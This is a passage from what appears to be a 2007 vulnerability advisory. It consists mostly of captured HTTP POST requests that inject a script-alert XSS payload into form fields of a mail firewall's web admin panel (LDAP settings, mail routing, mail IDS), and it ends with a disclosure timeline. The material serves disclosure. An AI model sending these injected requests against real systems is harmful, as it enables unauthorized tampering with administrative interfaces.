3%5D%2C+LabelValueBean%5BERROR%2C+4%5D%2C+LabelValueBean%5BWARNING%2C+5%
5D%2C+LabelValueBean%5BNOTIFICATION%2C+6%5D%2C+LabelValueBean%5BINFORMAT
ION%2C+7%5D%5D&rows%5B6%5D.attrValidateStr=30060019%3A0%2C30060007%3A1%2
C30060008%3A2%2C30060003%3A3%2C30060004%3A4%2C30060009%3A5%2C30060010%3A
6%2C30060005%3A7&rows%5B6%5D.attrDepends=&rows%5B6%5D.multipleValue=0&ro
ws%5B6%5D.modifyable=true&rows%5B6%5D.attrValueStrClone=3&rows%5B6%5D.la
ngTagId=2016407&rows%5B6%5D.attrValue=3&rows%5B7%5D.attrName=ldap_route_
aft_masq&rows%5B7%5D.attrType=5&rows%5B7%5D.attrValidate=&rows%5B7%5D.at
trValidateStr=&rows%5B7%5D.attrDepends=&rows%5B7%5D.multipleValue=0&rows
%5B7%5D.modifyable=true&rows%5B7%5D.attrValueStrClone=0&rows%5B7%5D.lang
TagId=2016408&submitValue=Submit
HTTP/1.0 200 OK
Date: Mon, 19 Feb 2007 10:22:56 GMT
Server: Apache
Pragma: no-cache
Cache-Control: no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Connection: close
Content-Type: text/html; charset=utf-8

.: [ XSS #14 ] :.

POST
https://172.0.0.2:10443/admin/ldap_ConfigureServiceProperties.do?method=
save
HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,
application/x-shockwave-flash, application/vnd.ms-excel,
application/vnd.ms-powerpoint, application/msword, */*
Referer:
https://172.0.0.2:10443/admin/ldap_ConfigureServiceProperties.do?method=
save
Accept-Language: es-ES,en-us;q=0.5
Content-Type: application/x-www-form-urlencoded
UA-CPU: x86
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR
2.0.50727; .NET CLR 1.1.4322) Paros/3.2.13
Host: 172.0.0.2:10443
Content-Length: 2842
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: CTSecureToken=2B59F89A721290CD7E7E0774CDB4A3FE_admin;
tabbedMenuSelected=11;
itemToHighlight=https%3A//172.0.0.2%3A10443/admin/ldap_ConfigureServiceP
roperties.do%3Fmethod%3Dinit%26procId%3D164;
menusToExpand=%2CConfigurationMenu%2CWebAdminConfigurationMenu%2CUserAcc
ountMenu%2CUserPreferenceMenu%2CAlertManagerMenu%2CMailFirewallMenu%2CLD
APConfigurationMenu%2C;
/admin/dnsProtection.dofirsttimeload=1; /admin/dnsProtection.do=;
JSESSIONID=5A6DABFA0209D0BEC17AF6841DEA184E
procId=164&rows%5B0%5D.attrName=sync_time&rows%5B0%5D.attrType=2&rows%5B
0%5D.attrValidate=%5B1-24%5D&rows%5B0%5D.attrValidateStr=%5B1-24%5D&rows
%5B0%5D.attrDepends=&rows%5B0%5D.multipleValue=0&rows%5B0%5D.modifyable=
true&rows%5B0%5D.attrValueStrClone=24&rows%5B0%5D.langTagId=2016401&rows
%5B0%5D.attrValueStr=24&rows%5B1%5D.attrName=sync_results_count&rows%5B1
%5D.attrType=2&rows%5B1%5D.attrValidate=%5B1-500%5D&rows%5B1%5D.attrVali
dateStr=%5B1-500%5D&rows%5B1%5D.attrDepends=&rows%5B1%5D.multipleValue=0
&rows%5B1%5D.modifyable=true&rows%5B1%5D.attrValueStrClone=50&rows%5B1%5
D.langTagId=2016402&rows%5B1%5D.attrValueStr=50&rows%5B2%5D.attrName=syn
c_rules_order&rows%5B2%5D.attrType=1&rows%5B2%5D.attrValidate=&rows%5B2%
5D.attrValidateStr=&rows%5B2%5D.attrDepends=&rows%5B2%5D.multipleValue=1
&rows%5B2%5D.modifyable=true&rows%5B2%5D.attrValueStrClone=&rows%5B2%5D.
langTagId=2016403&rows%5B2%5D.attrValue=%27%3E%3Cscript%3Ealert%28%27SIA
%27%29%3C%2Fscript%3E&rows%5B3%5D.attrName=ldap_fail_open&rows%5B3%5D.at
trType=5&rows%5B3%5D.attrValidate=&rows%5B3%5D.attrValidateStr=&rows%5B3
%5D.attrDepends=&rows%5B3%5D.multipleValue=0&rows%5B3%5D.modifyable=true
&rows%5B3%5D.attrValueStrClone=1&rows%5B3%5D.langTagId=2016404&rows%5B3%
5D.attrValue=true&rows%5B4%5D.attrName=ldap_failure_count&rows%5B4%5D.at
trType=2&rows%5B4%5D.attrValidate=%5B1-50%5D&rows%5B4%5D.attrValidateStr
=%5B1-50%5D&rows%5B4%5D.attrDepends=&rows%5B4%5D.multipleValue=0&rows%5B
4%5D.modifyable=true&rows%5B4%5D.attrValueStrClone=3&rows%5B4%5D.langTag
Id=2016405&rows%5B4%5D.attrValueStr=3&rows%5B5%5D.attrName=ldap_monitor_
intvl&rows%5B5%5D.attrType=2&rows%5B5%5D.attrValidate=%5B1-1440%5D&rows%
5B5%5D.attrValidateStr=%5B1-1440%5D&rows%5B5%5D.attrDepends=&rows%5B5%5D
.multipleValue=0&rows%5B5%5D.modifyable=true&rows%5B5%5D.attrValueStrClo
ne=5&rows%5B5%5D.langTagId=2016406&rows%5B5%5D.attrValueStr=5&rows%5B6%5
D.attrName=ldap_alert_type&rows%5B6%5D.attrType=12&rows%5B6%5D.attrValid
ate=%5BLabelValueBean%5BNo+Alert%2C+0%5D%2C+LabelValueBean%5BRESTART%2C+
1%5D%2C+LabelValueBean%5BSHUTDOWN%2C+2%5D%2C+LabelValueBean%5BCRITICAL%2
C+3%5D%2C+LabelValueBean%5BERROR%2C+4%5D%2C+LabelValueBean%5BWARNING%2C+
5%5D%2C+LabelValueBean%5BNOTIFICATION%2C+6%5D%2C+LabelValueBean%5BINFORM
ATION%2C+7%5D%5D&rows%5B6%5D.attrValidateStr=30060019%3A0%2C30060007%3A1
%2C30060008%3A2%2C30060003%3A3%2C30060004%3A4%2C30060009%3A5%2C30060010%
3A6%2C30060005%3A7&rows%5B6%5D.attrDepends=&rows%5B6%5D.multipleValue=0&
rows%5B6%5D.modifyable=true&rows%5B6%5D.attrValueStrClone=3&rows%5B6%5D.
langTagId=2016407&rows%5B6%5D.attrValue=3&rows%5B7%5D.attrName=ldap_rout
e_aft_masq&rows%5B7%5D.attrType=5&rows%5B7%5D.attrValidate=&rows%5B7%5D.
attrValidateStr=&rows%5B7%5D.attrDepends=&rows%5B7%5D.multipleValue=0&ro
ws%5B7%5D.modifyable=true&rows%5B7%5D.attrValueStrClone=0&rows%5B7%5D.la
ngTagId=2016408&submitValue=Submit
HTTP/1.0 200 OK
Date: Mon, 19 Feb 2007 10:23:00 GMT
Server: Apache
Pragma: no-cache
Cache-Control: no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Connection: close
Content-Type: text/html; charset=utf-8

.: [ XSS #15 ] :.

POST
https://172.0.0.2:10443/admin/ldap_ConfigureServiceProperties.do?method=
save
HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,
application/x-shockwave-flash, application/vnd.ms-excel,
application/vnd.ms-powerpoint, application/msword, */*
Referer:
https://172.0.0.2:10443/admin/ldap_ConfigureServiceProperties.do?method=
init&procId=164
Accept-Language: es-ES,en-us;q=0.5
Content-Type: application/x-www-form-urlencoded
UA-CPU: x86
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR
2.0.50727; .NET CLR 1.1.4322) Paros/3.2.13
Host: 172.0.0.2:10443
Content-Length: 2842
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: CTSecureToken=2B59F89A721290CD7E7E0774CDB4A3FE_admin;
tabbedMenuSelected=11;
itemToHighlight=https%3A//172.0.0.2%3A10443/admin/ldap_ConfigureServiceP
roperties.do%3Fmethod%3Dinit%26procId%3D164;
menusToExpand=%2CConfigurationMenu%2CWebAdminConfigurationMenu%2CUserAcc
ountMenu%2CUserPreferenceMenu%2CAlertManagerMenu%2CMailFirewallMenu%2CLD
APConfigurationMenu%2C;
/admin/dnsProtection.dofirsttimeload=1; /admin/dnsProtection.do=;
JSESSIONID=5A6DABFA0209D0BEC17AF6841DEA184E
procId=164&rows%5B0%5D.attrName=sync_time&rows%5B0%5D.attrType=2&rows%5B
0%5D.attrValidate=%5B1-24%5D&rows%5B0%5D.attrValidateStr=%5B1-24%5D&rows
%5B0%5D.attrDepends=&rows%5B0%5D.multipleValue=0&rows%5B0%5D.modifyable=
true&rows%5B0%5D.attrValueStrClone=24&rows%5B0%5D.langTagId=2016401&rows
%5B0%5D.attrValueStr=24&rows%5B1%5D.attrName=sync_results_count&rows%5B1
%5D.attrType=2&rows%5B1%5D.attrValidate=%5B1-500%5D&rows%5B1%5D.attrVali
dateStr=%5B1-500%5D&rows%5B1%5D.attrDepends=&rows%5B1%5D.multipleValue=0
&rows%5B1%5D.modifyable=true&rows%5B1%5D.attrValueStrClone=50&rows%5B1%5
D.langTagId=2016402&rows%5B1%5D.attrValueStr=50&rows%5B2%5D.attrName=syn
c_rules_order&rows%5B2%5D.attrType=1&rows%5B2%5D.attrValidate=&rows%5B2%
5D.attrValidateStr=&rows%5B2%5D.attrDepends=&rows%5B2%5D.multipleValue=1
&rows%5B2%5D.modifyable=true&rows%5B2%5D.attrValueStrClone=%27%3E%3Cscri
pt%3Ealert%28%27SIA%27%29%3C%2Fscript%3E&rows%5B2%5D.langTagId=2016403&r
ows%5B2%5D.attrValue=&rows%5B3%5D.attrName=ldap_fail_open&rows%5B3%5D.at
trType=5&rows%5B3%5D.attrValidate=&rows%5B3%5D.attrValidateStr=&rows%5B3
%5D.attrDepends=&rows%5B3%5D.multipleValue=0&rows%5B3%5D.modifyable=true
&rows%5B3%5D.attrValueStrClone=1&rows%5B3%5D.langTagId=2016404&rows%5B3%
5D.attrValue=true&rows%5B4%5D.attrName=ldap_failure_count&rows%5B4%5D.at
trType=2&rows%5B4%5D.attrValidate=%5B1-50%5D&rows%5B4%5D.attrValidateStr
=%5B1-50%5D&rows%5B4%5D.attrDepends=&rows%5B4%5D.multipleValue=0&rows%5B
4%5D.modifyable=true&rows%5B4%5D.attrValueStrClone=3&rows%5B4%5D.langTag
Id=2016405&rows%5B4%5D.attrValueStr=3&rows%5B5%5D.attrName=ldap_monitor_
intvl&rows%5B5%5D.attrType=2&rows%5B5%5D.attrValidate=%5B1-1440%5D&rows%
5B5%5D.attrValidateStr=%5B1-1440%5D&rows%5B5%5D.attrDepends=&rows%5B5%5D
.multipleValue=0&rows%5B5%5D.modifyable=true&rows%5B5%5D.attrValueStrClo
ne=5&rows%5B5%5D.langTagId=2016406&rows%5B5%5D.attrValueStr=5&rows%5B6%5
D.attrName=ldap_alert_type&rows%5B6%5D.attrType=12&rows%5B6%5D.attrValid
ate=%5BLabelValueBean%5BNo+Alert%2C+0%5D%2C+LabelValueBean%5BRESTART%2C+
1%5D%2C+LabelValueBean%5BSHUTDOWN%2C+2%5D%2C+LabelValueBean%5BCRITICAL%2
C+3%5D%2C+LabelValueBean%5BERROR%2C+4%5D%2C+LabelValueBean%5BWARNING%2C+
5%5D%2C+LabelValueBean%5BNOTIFICATION%2C+6%5D%2C+LabelValueBean%5BINFORM
ATION%2C+7%5D%5D&rows%5B6%5D.attrValidateStr=30060019%3A0%2C30060007%3A1
%2C30060008%3A2%2C30060003%3A3%2C30060004%3A4%2C30060009%3A5%2C30060010%
3A6%2C30060005%3A7&rows%5B6%5D.attrDepends=&rows%5B6%5D.multipleValue=0&
rows%5B6%5D.modifyable=true&rows%5B6%5D.attrValueStrClone=3&rows%5B6%5D.
langTagId=2016407&rows%5B6%5D.attrValue=3&rows%5B7%5D.attrName=ldap_rout
e_aft_masq&rows%5B7%5D.attrType=5&rows%5B7%5D.attrValidate=&rows%5B7%5D.
attrValidateStr=&rows%5B7%5D.attrDepends=&rows%5B7%5D.multipleValue=0&ro
ws%5B7%5D.modifyable=true&rows%5B7%5D.attrValueStrClone=0&rows%5B7%5D.la
ngTagId=2016408&submitValue=Submit
HTTP/1.0 200 OK
Date: Mon, 19 Feb 2007 10:23:16 GMT
Server: Apache
Pragma: no-cache
Cache-Control: no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Connection: close
Content-Type: text/html; charset=utf-8

.: [ XSS #16 ] :.

POST
https://172.0.0.2:10443/admin/mailFirewall_MailRoutingInternal.do?method
=save
HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,
application/x-shockwave-flash, application/vnd.ms-excel,
application/vnd.ms-powerpoint, application/msword, */*
Referer:
https://172.0.0.2:10443/admin/mailFirewall_MailRoutingInternal.do?method
=init&isMenuToggled=1
Accept-Language: es-ES,en-us;q=0.5
Content-Type: application/x-www-form-urlencoded
UA-CPU: x86
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR
2.0.50727; .NET CLR 1.1.4322) Paros/3.2.13
Host: 172.0.0.2:10443
Content-Length: 100
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: CTSecureToken=2B59F89A721290CD7E7E0774CDB4A3FE_admin;
tabbedMenuSelected=11;
itemToHighlight=https%3A//172.0.0.2%3A10443/admin/mailFirewall_MailRouti
ngInternal.do%3Fmethod%3Dinit%26isMenuToggled%3D1;
menusToExpand=%2CConfigurationMenu%2CWebAdminConfigurationMenu%2CUserAcc
ountMenu%2CUserPreferenceMenu%2CAlertManagerMenu%2CMailFirewallMenu%2CLD
APConfigurationMenu%2CMailRoutingMenu%2C;
/admin/dnsProtection.dofirsttimeload=1; /admin/dnsProtection.do=;
JSESSIONID=5A6DABFA0209D0BEC17AF6841DEA184E
dtype=INBOUND&input1=%27%3E%3Cscript%3Ealert%28%27SIA%27%29%3C%2Fscript%
3E&input2=&submitValue=Submit
HTTP/1.0 200 OK
Date: Mon, 19 Feb 2007 10:23:28 GMT
Server: Apache
Pragma: no-cache
Cache-Control: no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Connection: close
Content-Type: text/html; charset=utf-8

.: [ XSS #17 ] :.

POST https://172.0.0.2:10443/admin/mailIdsConfig.do?method=save HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,
application/x-shockwave-flash, application/vnd.ms-excel,
application/vnd.ms-powerpoint, application/msword, */*
Referer:
https://172.0.0.2:10443/admin/mailIdsConfig.do?method=init&isMenuToggled
=1&procId=90
Accept-Language: es-ES,en-us;q=0.5
Content-Type: application/x-www-form-urlencoded
UA-CPU: x86
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR
2.0.50727; .NET CLR 1.1.4322) Paros/3.2.13
Host: 172.0.0.2:10443
Content-Length: 2237
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: CTSecureToken=2B59F89A721290CD7E7E0774CDB4A3FE_admin;
tabbedMenuSelected=11;
itemToHighlight=https%3A//172.0.0.2%3A10443/admin/mailIdsConfig.do%3Fmet
hod%3Dinit%26isMenuToggled%3D1%26procId%3D90;
menusToExpand=%2CConfigurationMenu%2CWebAdminConfigurationMenu%2CUserAcc
ountMenu%2CUserPreferenceMenu%2CAlertManagerMenu%2CMailFirewallMenu%2CLD
APConfigurationMenu%2CMailRoutingMenu%2CMailIPSMenu%2CApplicationLevelMe
nu%2CMailIDSMenu%2CApplicationLevelMenu%2C;
/admin/dnsProtection.dofirsttimeload=1; /admin/dnsProtection.do=;
JSESSIONID=5A6DABFA0209D0BEC17AF6841DEA184E
procId=10&rows%5B0%5D.attrName=pass_monitor&rows%5B0%5D.attrType=5&rows%
5B0%5D.attrValidate=&rows%5B0%5D.attrValidateStr=&rows%5B0%5D.attrDepend
s=&rows%5B0%5D.multipleValue=0&rows%5B0%5D.modifyable=true&rows%5B0%5D.a
ttrValueStrClone=0&rows%5B0%5D.langTagId=2000006&rows%5B1%5D.attrName=en
able_dos&rows%5B1%5D.attrType=5&rows%5B1%5D.attrValidate=&rows%5B1%5D.at
trValidateStr=&rows%5B1%5D.attrDepends=&rows%5B1%5D.multipleValue=0&rows
%5B1%5D.modifyable=true&rows%5B1%5D.attrValueStrClone=0&rows%5B1%5D.lang
TagId=2000008&rows%5B2%5D.attrName=shm_timeout&rows%5B2%5D.attrType=2&ro
ws%5B2%5D.attrValidate=%5B1-65535%5D&rows%5B2%5D.attrValidateStr=%5B1-65
535%5D&rows%5B2%5D.attrDepends=&rows%5B2%5D.multipleValue=0&rows%5B2%5D.
modifyable=true&rows%5B2%5D.attrValueStrClone=100&rows%5B2%5D.langTagId=
2001009&rows%5B2%5D.attrValueStr=%27%3E%3Cscript%3Ealert%28%27SIA%27%29%
3C%2Fscript%3E&rows%5B3%5D.attrName=shm_spamcount&rows%5B3%5D.attrType=2
&rows%5B3%5D.attrValidate=%5B1-65535%5D&rows%5B3%5D.attrValidateStr=%5B1
-65535%5D&rows%5B3%5D.attrDepends=&rows%5B3%5D.multipleValue=0&rows%5B3%
5D.modifyable=true&rows%5B3%5D.attrValueStrClone=100&rows%5B3%5D.langTag
Id=2001010&rows%5B3%5D.attrValueStr=%27%3E%3Cscript%3Ealert%28%27SIA2%27
%29%3C%2Fscript%3E&rows%5B4%5D.attrName=passcrackswitch&rows%5B4%5D.attr
Type=5&rows%5B4%5D.attrValidate=&rows%5B4%5D.attrValidateStr=&rows%5B4%5
D.attrDepends=&rows%5B4%5D.multipleValue=0&rows%5B4%5D.modifyable=true&r
ows%5B4%5D.attrValueStrClone=0&rows%5B4%5D.langTagId=2004104&rows%5B5%5D
.attrName=passcrackcount&rows%5B5%5D.attrType=2&rows%5B5%5D.attrValidate
=%5B1-100%5D&rows%5B5%5D.attrValidateStr=%5B1-100%5D&rows%5B5%5D.attrDep
ends=&rows%5B5%5D.multipleValue=0&rows%5B5%5D.modifyable=true&rows%5B5%5
D.attrValueStrClone=5&rows%5B5%5D.langTagId=2004105&rows%5B5%5D.attrValu
eStr=%27%3E%3Cscript%3Ealert%28%27SIA3%27%29%3C%2Fscript%3E&rows%5B6%5D.
attrName=passtimeout&rows%5B6%5D.attrType=2&rows%5B6%5D.attrValidate=%5B
1-3600%5D&rows%5B6%5D.attrValidateStr=%5B1-3600%5D&rows%5B6%5D.attrDepen
ds=&rows%5B6%5D.multipleValue=0&rows%5B6%5D.modifyable=true&rows%5B6%5D.
attrValueStrClone=60&rows%5B6%5D.langTagId=2004106&rows%5B6%5D.attrValue
Str=%27%3E%3Cscript%3Ealert%28%27SIA4%27%29%3C%2Fscript%3E&submitValue=S
ubmit
HTTP/1.0 200 OK
Date: Mon, 19 Feb 2007 10:24:22 GMT
Server: Apache
Pragma: no-cache
Cache-Control: no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Connection: close
Content-Type: text/html; charset=utf-8

.: [ TIMELINE ] :.

22/Mar/2007 - We publish the advisory.
07/Mar/2007 - Second contact. Provider doesn't answered.
27/Feb/2007 - First contact with provider.
19/Feb/2007 - Vulnerabilities founded.

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus